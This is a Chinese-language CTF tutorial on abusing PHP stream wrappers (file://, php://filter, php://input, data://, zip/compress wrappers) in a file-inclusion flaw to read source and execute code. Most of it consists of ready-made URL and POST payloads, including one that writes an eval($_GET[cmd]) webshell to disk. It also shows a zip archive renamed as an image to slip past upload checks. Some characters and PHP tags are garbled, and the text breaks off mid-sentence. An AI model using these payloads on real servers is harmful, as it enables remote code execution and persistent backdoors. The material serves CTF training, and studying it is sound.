第php偽協(xié)議實(shí)現(xiàn)命令執(zhí)行詳情目錄1.file://協(xié)議2.php://協(xié)議3.data://協(xié)議4.zip://bzip://zlib://協(xié)議總結(jié)

1.file://協(xié)議

條件：

allow_url_fopen:off/on

allow_url_include:off/on

作用：

用于訪問本地文件系統(tǒng)，在ctf中通常用來讀取本地文件

在include()/require()/include_once()/require_once()參數(shù)可控的情況下，即使導(dǎo)入非.php文件，如shell.txt，依然按照php語法進(jìn)行解析，這是include()函數(shù)所決定的

說明:

file://文件系統(tǒng)是php使用的默認(rèn)封裝協(xié)議，用于展示本地文件系統(tǒng)。

用法：

/path/to/file.ext

relative/path/to/file.ext

fileInCwd.ext

C:/path/to/winfile.ext

C:\path\to\winfile.ext

\\smbserver\share\path\to\winfile.ext

file:///path/to/file.ext

示例：

1.file://[文件的絕對路徑和文件名]

/include.phpfile=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt

2.file://[文件的相對路徑和文件名]

/include.phpfile=./phpinfo.txt

3.http://網(wǎng)絡(luò)位置和文件名

/include.phpfile=/phpinfo.txt

2.php://協(xié)議

條件：

allow_url_open:off/on

allow_url_include:僅php://input

php://stdinphp://memoryphp://temp需要on

作用：

php://訪問各個輸入/輸出流(I/Ostreams),在ctf中經(jīng)常使用的是php://filter和php://input

php://filter用于讀取源碼

php://input用于執(zhí)行php代碼

說明：

php提供了一些雜項(xiàng)輸入/輸出(IO)流，允許訪問PHP的輸入輸出流，標(biāo)準(zhǔn)輸入輸出流和錯誤描述符：

php://filter使用：

php://filter/read=convert.base64-encode/resource=[文件名]

php://input的使用：

/include.phpfile=php://input

[POSTDATA部分]

phpphpinfo();

寫入一句話

/include.phpfile=php://input

[POSTDATA部分]

phpfputs(fopen('1juhua.php','w'),'php@eval($_GET[cmd]);

3.data://協(xié)議

作用：

php=5.2.0,可以使用data://數(shù)據(jù)流封裝器，以傳遞相應(yīng)格式的數(shù)據(jù)。通常用來執(zhí)行php代碼

用法：

data://text/plain,

如：

/include.phpfile=data://text/plain,php%20phpinfo();

4.zip://bzip://zlib://協(xié)議

作用：

zip://bzip://zlib://均屬于壓縮流，可以訪問壓縮文件中的子文件，更重要的是不需要指定后綴名，可以修改為任意后綴名，如jpg，png，gif，xxx等

示例：

1.zip://[壓縮文件絕對路徑]%23[壓縮文件內(nèi)的子文件文件名](#的編碼為%23)

壓縮phpinfo.txt為phpinfo.zip,壓縮包重命名為phpinfo.jpg,并上傳

/include.phpfile=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt

2.compress.bzip2://file.bz2

壓縮phpinfo.txt為phpinfo.bz2并上傳（同樣支持任意后綴名)

/include.phpfile=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz2

3.compress.zlib://file.gz

壓縮phpinfo.txt為phpinfo.gz并上傳（支持任意后綴名）

/include.phpfile=compress.zlib://E:\phpStudy\PHPTutorial\WWW\phpinfo.gz

總結(jié)

在ctf中常用的有data://,php://input,php://filter，file://

php://input，data://用來執(zhí)行命令

1.php://input的用法

/include.phpfile=php://input

[POSTDATA部分]

phpphpinfo();

2.data://用法

/include.phpfile=data://text/plain,php%20phpinfo();

php://filter，file://用來讀取文件

3.php://filter用法

/include.phpfile=php://filter/read=convert.base64-encode/resource=phpinfo.php（讀取php文件需要